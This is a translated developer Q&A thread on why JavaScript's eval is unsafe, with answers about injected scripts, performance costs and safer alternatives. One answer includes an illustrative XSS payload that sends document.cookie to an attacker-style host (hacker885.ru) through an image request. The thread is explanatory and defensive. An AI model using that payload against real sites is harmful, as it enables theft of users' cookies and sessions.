In the world of JavaScript developers, there is a well-established phrase:

"Eval is evil" (eval is evil)

Why and in what cases is it unsafe to use eval in javascript? If JavaScript is executed on the client side, how can an attacker hack the site?

The standard developer tools of many browsers allow to execute the code: anyone can execute JavaScript code, for example, in the Google Chrome browser, by entering this code into the console.

That is, it seems to me (superficially) that the only thing an attacker can do is to harm himself, because only he can see all his changes. However, it is believed that with eval it is possible to steal personal data of other users? What is the mechanism?

Why is eval classified as unsafe? If someone knows what specific threat this method can bring, please describe the situation and give a sample code.

  • one
    Here in detail already answered stackoverflow.com/questions/86513/… (thirty bukav) - vladiik
  • Example (1). Get json-data from a third-party site, and parse, not JSON.parse but eval . The owner of a third-party site does not care about security and the attacker uses it with all the consequences (for you). - Ivan Black
  • one
    @vladiik If possible, please post the entire answer, supplementing it with a link. - Nicolas Chabanovsky

2 answers 2

Well, look. Suppose we wrote a calculator in which you can register and exchange formulas (that is, the server part where at least the user credentials are stored). The attacker's goal is to gain access to the account of users, or the administrator of this resource.

The calculator itself works like this : when you press a numeric key or with the symbol of a mathematical key operation, we add it to the expr line, as a result we get:

 expr = '5 + 2 * 3';

When we click the "=" sign, eval is executed:

 var result = eval(expr);

Hack stage : If an attacker sends a formula where, besides the mathematical content, there is a javascript code, then to whom it will be sent, along with the formula, the malicious script will also be launched. The formula received from the attacker may look like this:

 expr = '(document.createElement("img")).src="http://hacker885.ru/sniff?c=" + document.cookie, 5 + 2 * 3';

As a result : the attacker will be able to: get cookies , access to local / session storage , access the content of the page, try to upload something (a virus for example).

Plus : If we send this message to the resource administrator in this way, then thanks to the rights we received, we can probably get to the backend of the resource.

In place of a calculator, there may be something more substantial: for example, an e-learning portal.

Something like this)

ps

A little off topic, but I want to touch on because there is.

Honestly, to find a task where it would really be necessary to use eval - it is difficult, everything that I came across - was connected with the similarity of a calculator or visualizer of mathematical formulas.

I can say that if you want to write an analysis of mathematical expressions is not difficult. In my free time I sketched such a parser: http://jsfiddle.net/kadymov/6d79wmfg/4/ . It is not written a bit, but it is already working, but takes 150 lines.

Use specific tools for specific tasks, and eval, if you leave where, then only at the prototype stage.

  • Do you mean that eval is running on the server? If not, i.e. in the local browser, it seems that the “attacker” and the user of the calculator are one person (otherwise describe where he came from). And why then does he need such frills to access cookies, etc.? - avp
  • No, the server 'eval' is not running. Both the attacker and the user are registered on the site as different users of the calculator. The attacker's goal is to gain access to the account. Of course, this is a made-up example, but there may be something more weighty in place of a calculator: for example, an e-learning portal. - Aleksander K.
  • It can be added that using eval is evil in any programming language that has this or similar tool. Especially in the case of network applications - skegg
  • @AleksanderK., Then the example (whatever the calculator) is so artificial that it simply does not work. An attacker can, without a locally executed eval, do in the browser (or another local program) everything that he does in your example using eval. Therefore, this example has nothing to do with site protection. - avp
  • @skegg, I would not argue so categorically. Of course, uncontrollable eval in (hypothetically widespread) network applications provokes the development of distributed attacks (I don’t know how successful the network is, but it’s consuming network resources - that's for sure). - avp
  1. Eval doesn’t cause harm in safety data.
  2. Not all data that seems to be verified are as such.
    For example, a server may send something written by another user that contains a malicious script. Or parameters can be taken from the address, or even from its hash fragment. The transition to such a page will be made via a simple link, and the code of the linker will be executed on the page of your domain.
  3. Eval reduces performance. And modern browsers are very sharpened on optimization, almost to the level of compilation into native code.
    One direct eval call is for this to end.
    Any function containing a direct call to eval cannot be optimized by the browser, since the code runs in its context. It will have to retain access to all the variables upstream of the chain of closures, quite possibly, thereby prolonging the life of what should have been collected by the garbage collector.
  4. The indirect eval call executes code in a global context.
    A common use case is to get a global object.
  5. In most cases, the eval call can be replaced with new Function.
  6. Why would you want to use eval?
    It is very likely that for this there is a better option.